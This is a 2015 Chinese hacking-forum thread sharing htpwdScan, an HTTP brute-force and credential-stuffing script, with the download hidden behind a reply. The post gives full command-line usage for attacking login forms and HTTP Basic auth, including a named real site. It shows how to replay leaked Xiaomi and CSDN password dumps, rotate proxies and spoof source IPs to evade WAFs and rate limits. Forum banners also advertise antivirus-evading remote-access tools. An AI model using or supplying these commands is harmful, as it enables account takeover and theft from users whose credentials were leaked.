一个简单的HTTP暴力破解、撞库攻击脚本

小瑞神 · 发表于 2015-7-12 20:52:14

回复下载地址：

游客，如果您要查看本帖隐藏内容请回复

htpwdScan 是一个简单的HTTP暴力破解、撞库攻击脚本. 它的特性：

支持批量校验并导入HTTP代理，低频撞库可以成功攻击大部分网站，绕过大部分防御策略和waf
支持直接导入互联网上泄露的社工库，发起撞库攻击
支持导入超大字典

简单示例

HTTP Basic认证
htpwdScan.py -u=http://auth.58.com/ -basic user.txt password.txt
导入用户名密码字典即可
表单破解
htpwdScan.py -f post2.txt -d user=user.txt passwd=password.txt -err="success\":false"
从 post2.txt 导入抓的http包，user和passwd是需要破解的参数，而 user.txt password.txt 是保存了密码的字典文件
success":false 是选择的失败标记，标记中若有双引号，请记得用右斜杠 \ 转义
GET参数破解
htpwdScan.py -d passwd=password.txt -u="http://xxx.com/index.php?m=login&username=test&passwd=test" -get -err="success\":false"
使用-get参数告诉脚本此处是GET请求
撞库攻击
htpwdScan.py -f=post.txt -database loginname,passwd=xiaomi.txt -regex="(\S+)\s+(\S+)" -err="用户名或密码错误" -fip
htpwdScan.py -f=post.txt -database passwd,loginname=csdn.net.sql -regex="\S+ # (\S+) # (\S+)" -err="用户名或密码错误" -fip
使用小米和csdn库发起撞库攻击。post.txt是抓包的HTTP请求
参数-regex设定从文件提取参数的正则表达式，此处需分组，分组的方式是使用括号()
小米的数据行格式是 [email protected] xxxxxxx 也即 (用户名)空白字符(密码)
(\S+)\s+(\S+) 可指定第一个非空白字符拿去填充loginname，而第二个非空白字符串拿去填充passwd
csdn的数据行格式是zdg # 12344321 # [email protected] . 正则表达式写作\S+ # (\S+) # (\S+)
第一个#后面的非空白字符串填充passwd，第二个#后面的非空白字符串填充loginname
请注意，参数的顺序是重要的
-fip 是启用伪造随机IP
校验HTTP代理
htpwdScan.py -f=post.txt -proxylist=proxies.txt -checkproxy -suc="用户名或密码错误"
要破解某个网站，批量测试使用代理是否连通目标网站，把HTTP请求保存到post.txt，然后用-suc参数设定连通标记
一个简单可行的校验方式是：
htpwdScan.py -u=http://www.baidu.com -get -proxylist=available.txt -checkproxy -suc="百度一下"

完整参数说明

脚本支持的小功能较多，请耐心阅读以下完整说明。建议多使用 -debug 参数查看HTTP请求是否有问题，没问题再发起真正的破解。

usage: htpwdScan.py [options]* An HTTP weak pass scanner. By LiJieJie *optional arguments: -h, --help 显示帮助Target: -u REQUESTURL 设定目标URL, 示例. -u="https://www.test.com/login.php" -f REQUESTFILE 从文件导入HTTP请求 -https 当从文件导入HTTP请求时，启用https(SSL) -get 使用GET方法，默认: POST -basic [ ...] HTTP Basic 暴力破解. 示例. -basic users.dic pass.dicDictionary: -d Param=DictFile [Param=DictFile ...] 为参数设定字典文件, 支持哈希函数如 md5, md5_16, sha1. 示例. -d user=users.dic pass=md5(pass.dic)Detect: -no302 无视302跳转, 默认302敏感 -err ERR [ERR ...] 响应文本的破解失败标记, 示例. -err "user not exist" "password wrong" -suc SUC [SUC ...] 响应文本中的破解成功标记, e.g. -suc "welcome," "admin" -herr HERR 响应HTTP头的破解失败标记 -hsuc HSUC 响应HTTP头的破解成功标记 -rtxt RetryText 响应文本中的重试标记，出现则重试请求, 示例. -rtxt="IP blocked" -rntxt RetryNoText 响应文本中的重试标记,未出现则重试请求，示例. -rntxt="<body>" -rheader RetryHeader 响应头中的重试标记，出现则重试请求, 示例. -rheader="Set-Cookie:" -rnheader RetryNoHeader 响应头中的重试标记，未出现则重试请求, 示例. -rheader="HTTP/1.1 200 OK"Proxy and spoof: -proxy Server:Port 设定少量HTTP代理示例. -proxy=127.0.0.1:8000,8.8.8.8:8000 -proxylist ProxyListFile 从文件批量导入HTTP代理, 示例. -proxylist=proxys.txt -checkproxy 检查代理服务器的可用性. 可用代理输出到 001.proxy.servers.txt -fip 生成随机X-Forwarded-For欺骗源IP -fsid FSID 生成随机session ID. 示例. -fsid PHPSESSID -sleep SECONDS 每次HTTP结束，等待SECONDS秒, 避免IP被临时屏蔽，进入黑名单Database attack: -database DATABASE 导入社工库中的数据. 示例. -database user,pass=csdn.txt -regex REGEX 从社工库中提取数据的正则表达式，必须分组. 示例. -regex="(\S+)\s+(\S+)"General: -t THREADS 工作线程数，默认50 -o OUTPUT 输出文件. 默认: 000.Cracked.Passwords.txt -debug 进入debug模式检查HTTP请求和HTTP响应 -nov 只显示破解成功的条目，不显示进度 -v show program's version number and exi

admin888 · 发表于 2015-7-12 22:14:08

支持支持啊

a1540948917 · 发表于 2015-7-13 13:12:50

回复下载看看

格式化、、》 · 发表于 2015-7-15 00:27:23

不管东西咋样还是先谢谢了

阿涛网络 · 发表于 2015-7-19 11:40:10

看看怎么用的支持啦

sunflower · 发表于 2017-1-9 02:00:30

一个简单的HTTP暴力破解、撞库攻击脚本

寓言 · 发表于 2017-8-9 21:31:13

HTTP暴力破解

		自动登录	找回密码
密码			立即注册

[悬赏公告] - 严查灌水，打造一个无水论坛，从即日起.请大家互相监督，发现恶意灌水的，请发贴举报，核实后会给予5-10的墨币奖励。	[官方公告] 从今日起所有会员发布工具必须到审核板块进行审核，如有违反永久禁言处理！	[招聘招聘]-招聘各方面给力版主，要求每日发帖不少于3贴，每天在线时间6个小时以上，具体福利和待遇联系TG客服或者在线管理员
[官方公告]1.发现网盘下载地址失效！可以发贴举报审核证实后给予奖励10-20墨币。2.即日起！不管是谁发贴！都不能带QQ群已及个人QQ。个人网站,发现后严格处理。	[官方业务]-加入墨客安全网Vip,圆你日抓千鸡梦,各种精品教程,免杀远控,压力测试等你拿,期待各位会员的加入,即可享受众多福利！	【官方公告】论坛所有广告均为商业行为，需要交易的请尽量走担保程序，所有因广告产生的任何纠纷请私下解决
【官方业务】精品广告位招租，需要请联系官方TG客服	【官方业务】精品广告位招租，需要请联系官方TG客服	【官方业务】精品广告位招租，需要请联系官方TG客服

[扫描爆破（已审核）] 一个简单的HTTP暴力破解、撞库攻击脚本

论坛元老

热心会员

活跃会员

突出贡献

优秀版主

灌水之王

最佳新人

荣誉管理

兄弟义气

音乐大师

站长推荐 /1